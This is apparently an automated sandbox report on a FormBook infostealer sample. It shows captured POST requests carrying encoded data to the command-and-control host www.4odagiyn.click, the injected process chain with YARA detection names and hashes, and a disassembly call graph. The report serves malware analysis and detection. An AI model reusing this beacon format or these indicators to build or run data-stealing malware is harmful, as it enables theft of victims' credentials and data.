                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 73 78 59 74 36 37 50 59 64 70 50 77 58 6a 4b 78 30 45 2b 36 51 4c 79 48 68 78 69 59 75 36 72 69 77 50 68 4a 46 6b 31 36 30 6e 50 7a 44 41 50 5a 57 34 33 31 61 42 4b 46 38 43 54 38 4f 6a 66 6a 41 4c 69 78 4d 52 38 2b 74 32 6c 63 30 4b 55 4c 56 69 30 74 4f 6e 76 31 62 75 30 41 6e 44 4d 72 55 48 72 68 63 70 64 57 33 72 50 46 42 72 36 45 63 7a 75 57 52 78 74 43 78 66 6a 61 73 46 36 6f 66 6c 73 66 7a 57 47 50 5a 6d 48 58 51 54 46 66 69 6c 79 39 6b 67 4d 44 77 66 4a 68 32 63 61 62 64 75 7a 2f 51 50 58 71 66 71 37 73 62 64 4e 71 39 73 52 6a 76 30 53 67 6d 74 49 4a 51 4d 49 38 33 66 43 50 33 4c 49 3d
                                                    Data Ascii: V6h=sxYt67PYdpPwXjKx0E+6QLyHhxiYu6riwPhJFk160nPzDAPZW431aBKF8CT8OjfjALixMR8+t2lc0KULVi0tOnv1bu0AnDMrUHrhcpdW3rPFBr6EczuWRxtCxfjasF6oflsfzWGPZmHXQTFfily9kgMDwfJh2cabduz/QPXqfq7sbdNq9sRjv0SgmtIJQMI83fCP3LI=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    47192.168.2.55723872.52.178.23802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:57.260699987 CEST728OUTPOST /f1qc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.4odagiyn.click
                                                    Referer: http://www.4odagiyn.click/f1qc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 73 78 59 74 36 37 50 59 64 70 50 77 58 44 36 78 34 46 2b 36 53 72 79 45 6b 78 69 59 6c 61 71 70 77 4f 64 4a 46 6c 77 6e 30 55 72 7a 44 69 6e 5a 45 38 6a 31 50 42 4b 46 7a 69 53 34 42 44 66 39 41 4c 2b 35 4d 51 41 2b 74 32 68 63 30 50 77 4c 56 52 63 75 50 33 76 33 4f 2b 30 47 6b 7a 4d 72 55 48 72 68 63 70 68 77 33 76 62 46 42 62 71 45 64 57 61 4a 53 78 74 42 79 66 6a 61 6d 6c 36 73 66 6c 74 77 7a 58 61 68 5a 6a 4c 58 51 53 31 66 69 52 65 36 74 67 4d 46 75 76 49 54 6e 66 2f 74 62 4f 76 43 54 39 65 41 4d 70 7a 65 54 4c 67 41 6e 4f 5a 4c 38 55 2b 59 32 2b 41 2b 42 38 70 56 74 38 53 2f 70 63 66 48 4f 50 50 59 69 4d 34 35 6b 34 77 45 6c 4d 59 43 61 45 34 30
                                                    Data Ascii: V6h=sxYt67PYdpPwXD6x4F+6SryEkxiYlaqpwOdJFlwn0UrzDinZE8j1PBKFziS4BDf9AL+5MQA+t2hc0PwLVRcuP3v3O+0GkzMrUHrhcphw3vbFBbqEdWaJSxtByfjaml6sfltwzXahZjLXQS1fiRe6tgMFuvITnf/tbOvCT9eAMpzeTLgAnOZL8U+Y2+A+B8pVt8S/pcfHOPPYiM45k4wElMYCaE40


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    48192.168.2.55723972.52.178.23802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:59.794142008 CEST1745OUTPOST /f1qc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.4odagiyn.click
                                                    Referer: http://www.4odagiyn.click/f1qc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 73 78 59 74 36 37 50 59 64 70 50 77 58 44 36 78 34 46 2b 36 53 72 79 45 6b 78 69 59 6c 61 71 70 77 4f 64 4a 46 6c 77 6e 30 55 6a 7a 44 7a 48 5a 57 62 66 31 4a 78 4b 46 74 53 53 31 42 44 65 68 41 4c 6d 39 4d 51 4d 78 74 31 56 63 31 70 38 4c 43 55 67 75 47 33 76 33 4d 2b 30 44 6e 44 4e 72 55 48 62 66 63 70 52 77 33 76 62 46 42 64 47 45 61 44 75 4a 66 52 74 43 78 66 6a 57 73 46 36 49 66 68 49 48 7a 58 65 66 5a 33 33 58 4a 79 6c 66 6b 79 6d 36 77 51 4d 48 76 76 49 4c 6e 66 44 2b 62 4f 79 7a 54 38 62 76 4d 70 4c 65 51 73 56 33 36 73 42 76 75 32 2b 4d 37 35 59 77 5a 71 78 71 6e 74 65 57 71 65 48 58 4b 74 6d 37 73 70 73 48 68 73 31 7a 30 5a 49 71 62 78 35 42 54 57 77 77 72 4e 64 31 78 54 51 76 64 76 52 46 46 37 63 31 53 4e 69 42 53 47 69 49 55 56 46 79 55 52 75 2f 78 57 4f 30 48 6a 6b 47 33 6e 79 42 71 67 71 44 47 56 4a 5a 75 68 65 32 6c 38 6b 57 53 46 63 6d 41 46 6c 6d 71 76 6c 6f 69 6d 56 7a 71 6e 61 67 57 4d 32 77 2f 4f 68 56 38 66 47 61 67 4c 6e 30 56 6b 6e 54 63 4c 33 52 37 77 2b 58 63 45 [TRUNCATED]
                                                    Data Ascii: V6h=sxYt67PYdpPwXD6x4F+6SryEkxiYlaqpwOdJFlwn0UjzDzHZWbf1JxKFtSS1BDehALm9MQMxt1Vc1p8LCUguG3v3M+0DnDNrUHbfcpRw3vbFBdGEaDuJfRtCxfjWsF6IfhIHzXefZ33XJylfkym6wQMHvvILnfD+bOyzT8bvMpLeQsV36sBvu2+M75YwZqxqnteWqeHXKtm7spsHhs1z0ZIqbx5BTWwwrNd1xTQvdvRFF7c1SNiBSGiIUVFyURu/xWO0HjkG3nyBqgqDGVJZuhe2l8kWSFcmAFlmqvloimVzqnagWM2w/OhV8fGagLn0VknTcL3R7w+XcERbU3V8g6CdCqhg4+C4ZX5D8oLpMRdJd9kL6yLAkHcERFyq2jgRwkhTHq+Ay8BdiI+w7uY8SfTwLd/DHk5I+rqutGAeBs4v5Mcxe9mVtLdj5gSo/TMkTGXiH1o7zGWh5eGNjc4RVC3WufxdtAXJnz3kQc8YEUQoZu7ntXzs30vJFdEd/WU9l0l5u4MxEgasmCVrJb7e+ef7kLcEtP/qNTSym1h/8jJDzRctn8j8/z1szuCL7H6oLFoB45qb7rckZmK8tRGak8m7UD/K4Y7FbXtSSkUH3nNn9SBgUaEI3KgZWOHAbWgdl+VJl5UXhesAHv1tgP5CFHrHXlXM2W19J9rNlzn4DWKqHYocyOgpdGXxPqvZa9EFztuk7MGiMYEG6c6CTO3r4Y0VCYBtNlOOlXmjnzF4+DA3DqeV7aQimd25/7Hb3CLAbKAC/okAoNJvvvEWgbHlyCipsmMG+lK4cJcQzt4OoiFTVgERyTrcnwZ1591lBvTi+ZE77ck0NMjkZgKaqgmC51fUk74KOF3vpbOoSDFXh2CA9jnIHUlGFNZWIOyOsX/Nw/nWwAPV79sonvs4vQtvF4M0MyOliC/e5D16Llp0PMlerDQOKirwty8VrRd6g4EI1ZSxJN1TzpAzhjoJpRhoPZ+NVIAZVtrb7OJfG1Khvw9/VSYG [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    49192.168.2.55724072.52.178.23802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:28:02.342185974 CEST449OUTGET /f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:28:02.887254953 CEST508INHTTP/1.1 302 Moved Temporarily
                                                    Date: Thu, 05 Sep 2024 12:28:02 GMT
                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                    X-Powered-By: PHP/5.4.16
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Location: http://ww7.4odagiyn.click/f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ&usid=16&utid=34491565278
                                                    Content-Length: 0
                                                    Content-Type: text/html; charset=UTF-8


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:08:23:58
                                                    Start date:05/09/2024
                                                    Path:C:\Users\user\Desktop\0XLuA614VK.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\0XLuA614VK.exe"
                                                    Imagebase:0xf20000
                                                    File size:1'296'896 bytes
                                                    MD5 hash:562CB5DCBA0E691BF01AB2C020C0837E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:08:23:59
                                                    Start date:05/09/2024
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\0XLuA614VK.exe"
                                                    Imagebase:0x50000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:08:24:07
                                                    Start date:05/09/2024
                                                    Path:C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe"
                                                    Imagebase:0x50000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:4
                                                    Start time:08:24:09
                                                    Start date:05/09/2024
                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                    Imagebase:0x4b0000
                                                    File size:59'904 bytes
                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:6
                                                    Start time:08:24:34
                                                    Start date:05/09/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff79f9e0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:3.4%
                                                      Dynamic/Decrypted Code Coverage:1.3%
                                                      Signature Coverage:3.2%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:54
                                                      execution_graph 96190 f21033 96195 f24c91 96190->96195 96194 f21042 96203 f2a961 96195->96203 96200 f24d9c 96201 f21038 96200->96201 96211 f251f7 22 API calls __fread_nolock 96200->96211 96202 f400a3 29 API calls __onexit 96201->96202 96202->96194 96212 f3fe0b 96203->96212 96205 f2a976 96222 f3fddb 96205->96222 96207 f24cff 96208 f23af0 96207->96208 96247 f23b1c 96208->96247 96211->96200 96214 f3fddb 96212->96214 96215 f3fdfa 96214->96215 96217 f3fdfc 96214->96217 96232 f4ea0c 96214->96232 96239 f44ead 7 API calls 2 library calls 96214->96239 96215->96205 96221 f4066d 96217->96221 96240 f432a4 RaiseException 96217->96240 96220 f4068a 96220->96205 96241 f432a4 RaiseException 96221->96241 96224 f3fde0 96222->96224 96223 f4ea0c ___std_exception_copy 21 API calls 96223->96224 96224->96223 96225 f3fdfa 96224->96225 96228 f3fdfc 96224->96228 96244 f44ead 7 API calls 2 library calls 96224->96244 96225->96207 96227 f4066d 96246 f432a4 RaiseException 96227->96246 96228->96227 96245 f432a4 RaiseException 96228->96245 96231 f4068a 96231->96207 96238 f53820 _abort 96232->96238 96233 f5385e 96243 f4f2d9 20 API calls _abort 96233->96243 96235 f53849 RtlAllocateHeap 96236 f5385c 96235->96236 96235->96238 96236->96214 96238->96233 96238->96235 96242 f44ead 7 API calls 2 library calls 96238->96242 96239->96214 96240->96221 96241->96220 96242->96238 96243->96236 96244->96224 96245->96227 96246->96231 96248 f23b0f 96247->96248 96249 f23b29 96247->96249 96248->96200 96249->96248 96250 f23b30 RegOpenKeyExW 96249->96250 96250->96248 96251 f23b4a RegQueryValueExW 96250->96251 96252 f23b80 RegCloseKey 96251->96252 96253 f23b6b 96251->96253 96252->96248 96253->96252 96254 f73f75 96265 f3ceb1 96254->96265 96256 f73f8b 96257 f74006 96256->96257 96332 f3e300 23 API calls 96256->96332 96274 f2bf40 96257->96274 96259 f73fe6 96260 f74052 96259->96260 96333 f91abf 22 API calls 96259->96333 96263 f74a88 96260->96263 96334 f9359c 82 API calls __wsopen_s 96260->96334 96266 f3ced2 96265->96266 96267 f3cebf 96265->96267 96269 f3ced7 96266->96269 96270 f3cf05 96266->96270 96335 f2aceb 23 API calls messages 96267->96335 96272 f3fddb 22 API calls 96269->96272 96336 f2aceb 23 API calls messages 96270->96336 96273 f3cec9 96272->96273 96273->96256 96337 f2adf0 96274->96337 96276 f2bf9d 96277 f704b6 96276->96277 96278 f2bfa9 96276->96278 96356 f9359c 82 API calls __wsopen_s 96277->96356 96280 f704c6 96278->96280 96281 f2c01e 96278->96281 96357 f9359c 82 API calls __wsopen_s 96280->96357 96342 f2ac91 96281->96342 96284 f704f5 96302 f7055a 96284->96302 96358 f3d217 235 API calls 96284->96358 96285 f87120 22 API calls 96295 f2c039 __fread_nolock messages 96285->96295 96287 f2c7da 96290 f3fe0b 22 API calls 96287->96290 96293 f2c808 __fread_nolock 96290->96293 96298 f3fe0b 22 API calls 96293->96298 96295->96284 96295->96285 96295->96287 96295->96293 96296 f2ec40 235 API calls 96295->96296 96297 f7091a 96295->96297 96299 f2af8a 22 API calls 96295->96299 96295->96302 96303 f708a5 96295->96303 96307 f70591 96295->96307 96308 f708f6 96295->96308 96313 f2bbe0 40 API calls 96295->96313 96315 f2c237 96295->96315 96317 f3fe0b 22 API calls 96295->96317 96319 f2c603 96295->96319 96324 f3fddb 22 API calls 96295->96324 96326 f709bf 96295->96326 96346 f2ad81 96295->96346 96361 f87099 22 API calls __fread_nolock 96295->96361 96362 fa5745 54 API calls _wcslen 96295->96362 96363 f3aa42 22 API calls messages 96295->96363 96364 f8f05c 40 API calls 96295->96364 96365 f2a993 41 API calls 96295->96365 96366 f2aceb 23 API calls messages 96295->96366 96296->96295 96393 f93209 23 API calls 96297->96393 96330 f2c350 __fread_nolock messages 96298->96330 96299->96295 96302->96319 96359 f9359c 82 API calls __wsopen_s 96302->96359 96367 f2ec40 96303->96367 96306 f708cf 96306->96319 96391 f2a81b 41 API calls 96306->96391 96360 f9359c 82 API calls __wsopen_s 96307->96360 96392 f9359c 82 API calls __wsopen_s 96308->96392 96313->96295 96316 f2c253 96315->96316 96394 f2a8c7 96315->96394 96320 f70976 96316->96320 96323 f2c297 messages 96316->96323 96317->96295 96319->96260 96398 f2aceb 23 API calls messages 96320->96398 96323->96326 96353 f2aceb 23 API calls messages 96323->96353 96324->96295 96326->96319 96399 f9359c 82 API calls __wsopen_s 96326->96399 96327 f2c335 96327->96326 96328 f2c342 96327->96328 96354 f2a704 22 API calls messages 96328->96354 96331 f2c3ac 96330->96331 96355 f3ce17 22 API calls messages 96330->96355 96331->96260 96332->96259 96333->96257 96334->96263 96335->96273 96336->96273 96338 f2ae01 96337->96338 96341 f2ae1c messages 96337->96341 96400 f2aec9 96338->96400 96340 f2ae09 CharUpperBuffW 96340->96341 96341->96276 96343 f2acae 96342->96343 96344 f2acd1 96343->96344 96406 f9359c 82 API calls __wsopen_s 96343->96406 96344->96295 96347 f2ad92 96346->96347 96348 f6fadb 96346->96348 96349 f3fddb 22 API calls 96347->96349 96350 f2ad99 96349->96350 96407 f2adcd 96350->96407 96353->96327 96354->96330 96355->96330 96356->96280 96357->96319 96358->96302 96359->96319 96360->96319 96361->96295 96362->96295 96363->96295 96364->96295 96365->96295 96366->96295 96368 f2ec76 messages 96367->96368 96369 f3fddb 22 API calls 96368->96369 96370 f2fef7 96368->96370 96373 f74b0b 96368->96373 96374 f2a8c7 22 API calls 96368->96374 96375 f74600 96368->96375 96381 f40242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96368->96381 96382 f2fbe3 96368->96382 96383 f2ed9d messages 96368->96383 96384 f2a961 22 API calls 96368->96384 96387 f400a3 29 API calls pre_c_initialization 96368->96387 96388 f74beb 96368->96388 96389 f401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96368->96389 96390 f2f3ae messages 96368->96390 96414 f306a0 96368->96414 96428 f301e0 235 API calls 2 library calls 96368->96428 96369->96368 96378 f2a8c7 22 API calls 96370->96378 96370->96383 96430 f9359c 82 API calls __wsopen_s 96373->96430 96374->96368 96379 f2a8c7 22 API calls 96375->96379 96375->96383 96378->96383 96379->96383 96381->96368 96382->96383 96385 f74bdc 96382->96385 96382->96390 96383->96306 96384->96368 96431 f9359c 82 API calls __wsopen_s 96385->96431 96387->96368 96432 f9359c 82 API calls __wsopen_s 96388->96432 96389->96368 96390->96383 96429 f9359c 82 API calls __wsopen_s 96390->96429 96391->96308 96392->96319 96393->96315 96395 f2a8ea __fread_nolock 96394->96395 96396 f2a8db 96394->96396 96395->96316 96396->96395 96397 f3fe0b 22 API calls 96396->96397 96397->96395 96398->96326 96399->96319 96401 f2aedc 96400->96401 96405 f2aed9 __fread_nolock 96400->96405 96402 f3fddb 22 API calls 96401->96402 96403 f2aee7 96402->96403 96404 f3fe0b 22 API calls 96403->96404 96404->96405 96405->96340 96406->96344 96411 f2addd 96407->96411 96408 f2adb6 96408->96295 96409 f3fddb 22 API calls 96409->96411 96410 f2a961 22 API calls 96410->96411 96411->96408 96411->96409 96411->96410 96412 f2a8c7 22 API calls 96411->96412 96413 f2adcd 22 API calls 96411->96413 96412->96411 96413->96411 96417 f30863 messages 96414->96417 96421 f306bd 96414->96421 96415 f30d36 96418 f30847 messages 96415->96418 96436 f3acd5 39 API calls 96415->96436 96417->96415 96417->96418 96420 f75ffd 96417->96420 96425 f3082a messages 96417->96425 96418->96368 96424 f7600f 96420->96424 96435 f4cf65 39 API calls 96420->96435 96421->96415 96421->96417 96421->96418 96423 f3081e 96421->96423 96421->96425 96423->96425 96427 f75e15 96423->96427 96424->96368 96425->96418 96425->96420 96434 f3ce17 22 API calls messages 96425->96434 96433 f4cf65 39 API calls 96427->96433 96428->96368 96429->96383 96430->96383 96431->96388 96432->96383 96433->96427 96434->96425 96435->96424 96436->96418 96437 f2df10 96440 f2b710 96437->96440 96441 f2b72b 96440->96441 96442 f70146 96441->96442 96443 f700f8 96441->96443 96470 f2b750 96441->96470 96482 fa58a2 235 API calls 2 library calls 96442->96482 96446 f70102 96443->96446 96449 f7010f 96443->96449 96443->96470 96480 fa5d33 235 API calls 96446->96480 96463 f2ba20 96449->96463 96481 fa61d0 235 API calls 2 library calls 96449->96481 96453 f2bbe0 40 API calls 96453->96470 96454 f703d9 96454->96454 96456 f3d336 40 API calls 96456->96470 96458 f2ba4e 96459 f70322 96485 fa5c0c 82 API calls 96459->96485 96463->96458 96486 f9359c 82 API calls __wsopen_s 96463->96486 96467 f2ec40 235 API calls 96467->96470 96468 f2a8c7 22 API calls 96468->96470 96470->96453 96470->96456 96470->96458 96470->96459 96470->96463 96470->96467 96470->96468 96471 f2a81b 41 API calls 96470->96471 96472 f3d2f0 40 API calls 96470->96472 96473 f3a01b 235 API calls 96470->96473 96474 f40242 5 API calls __Init_thread_wait 96470->96474 96475 f3edcd 22 API calls 96470->96475 96476 f400a3 29 API calls __onexit 96470->96476 96477 f401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96470->96477 96478 f3ee53 82 API calls 96470->96478 96479 f3e5ca 235 API calls 96470->96479 96483 f2aceb 23 API calls messages 96470->96483 96484 f7f6bf 23 API calls 96470->96484 96471->96470 96472->96470 96473->96470 96474->96470 96475->96470 96476->96470 96477->96470 96478->96470 96479->96470 96480->96449 96481->96463 96482->96470 96483->96470 96484->96470 96485->96463 96486->96454 96487 f23156 96490 f23170 96487->96490 96491 f23187 96490->96491 96492 f231eb 96491->96492 96493 f2318c 96491->96493 96531 f231e9 96491->96531 96494 f231f1 96492->96494 96495 f62dfb 96492->96495 96496 f23265 PostQuitMessage 96493->96496 96497 f23199 96493->96497 96499 f231f8 96494->96499 96500 f2321d SetTimer RegisterWindowMessageW 96494->96500 96539 f218e2 10 API calls 96495->96539 96504 f2316a 96496->96504 96502 f231a4 96497->96502 96503 f62e7c 96497->96503 96498 f231d0 DefWindowProcW 96498->96504 96505 f23201 KillTimer 96499->96505 96506 f62d9c 96499->96506 96500->96504 96508 f23246 CreatePopupMenu 96500->96508 96509 f231ae 96502->96509 96510 f62e68 96502->96510 96554 f8bf30 34 API calls ___scrt_fastfail 96503->96554 96535 f230f2 Shell_NotifyIconW ___scrt_fastfail 96505->96535 96518 f62dd7 MoveWindow 96506->96518 96519 f62da1 96506->96519 96507 f62e1c 96540 f3e499 42 API calls 96507->96540 96508->96504 96515 f62e4d 96509->96515 96516 f231b9 96509->96516 96553 f8c161 27 API calls ___scrt_fastfail 96510->96553 96515->96498 96552 f80ad7 22 API calls 96515->96552 96522 f231c4 96516->96522 96523 f23253 96516->96523 96517 f62e8e 96517->96498 96517->96504 96518->96504 96524 f62dc6 SetFocus 96519->96524 96525 f62da7 96519->96525 96520 f23214 96536 f23c50 DeleteObject DestroyWindow 96520->96536 96521 f23263 96521->96504 96522->96498 96541 f230f2 Shell_NotifyIconW ___scrt_fastfail 96522->96541 96537 f2326f 44 API calls ___scrt_fastfail 96523->96537 96524->96504 96525->96522 96526 f62db0 96525->96526 96538 f218e2 10 API calls 96526->96538 96531->96498 96533 f62e41 96542 f23837 96533->96542 96535->96520 96536->96504 96537->96521 96538->96504 96539->96507 96540->96522 96541->96533 96543 f23862 ___scrt_fastfail 96542->96543 96555 f24212 96543->96555 96547 f63386 Shell_NotifyIconW 96548 f23906 Shell_NotifyIconW 96559 f23923 96548->96559 96550 f238e8 96550->96547 96550->96548 96551 f2391c 96551->96531 96552->96531 96553->96521 96554->96517 96556 f635a4 96555->96556 96557 f238b7 96555->96557 96556->96557 96558 f635ad DestroyIcon 96556->96558 96557->96550 96581 f8c874 42 API calls _strftime 96557->96581 96558->96557 96560 f2393f 96559->96560 96579 f23a13 96559->96579 96582 f26270 96560->96582 96563 f63393 LoadStringW 96566 f633ad 96563->96566 96564 f2395a 96587 f26b57 96564->96587 96572 f2a8c7 22 API calls 96566->96572 96574 f23994 ___scrt_fastfail 96566->96574 96567 f2396f 96568 f2397c 96567->96568 96569 f633c9 96567->96569 96568->96566 96570 f23986 96568->96570 96571 f26350 22 API calls 96569->96571 96599 f26350 96570->96599 96575 f633d7 96571->96575 96572->96574 96577 f239f9 Shell_NotifyIconW 96574->96577 96575->96574 96608 f233c6 96575->96608 96577->96579 96578 f633f9 96580 f233c6 22 API calls 96578->96580 96579->96551 96580->96574 96581->96550 96583 f3fe0b 22 API calls 96582->96583 96584 f26295 96583->96584 96585 f3fddb 22 API calls 96584->96585 96586 f2394d 96585->96586 96586->96563 96586->96564 96588 f26b67 _wcslen 96587->96588 96589 f64ba1 96587->96589 96592 f26ba2 96588->96592 96593 f26b7d 96588->96593 96618 f293b2 96589->96618 96591 f64baa 96591->96591 96595 f3fddb 22 API calls 96592->96595 96617 f26f34 22 API calls 96593->96617 96597 f26bae 96595->96597 96596 f26b85 __fread_nolock 96596->96567 96598 f3fe0b 22 API calls 96597->96598 96598->96596 96600 f26362 96599->96600 96601 f64a51 96599->96601 96622 f26373 96600->96622 96632 f24a88 22 API calls __fread_nolock 96601->96632 96604 f64a5b 96606 f64a67 96604->96606 96607 f2a8c7 22 API calls 96604->96607 96605 f2636e 96605->96574 96607->96606 96609 f630bb 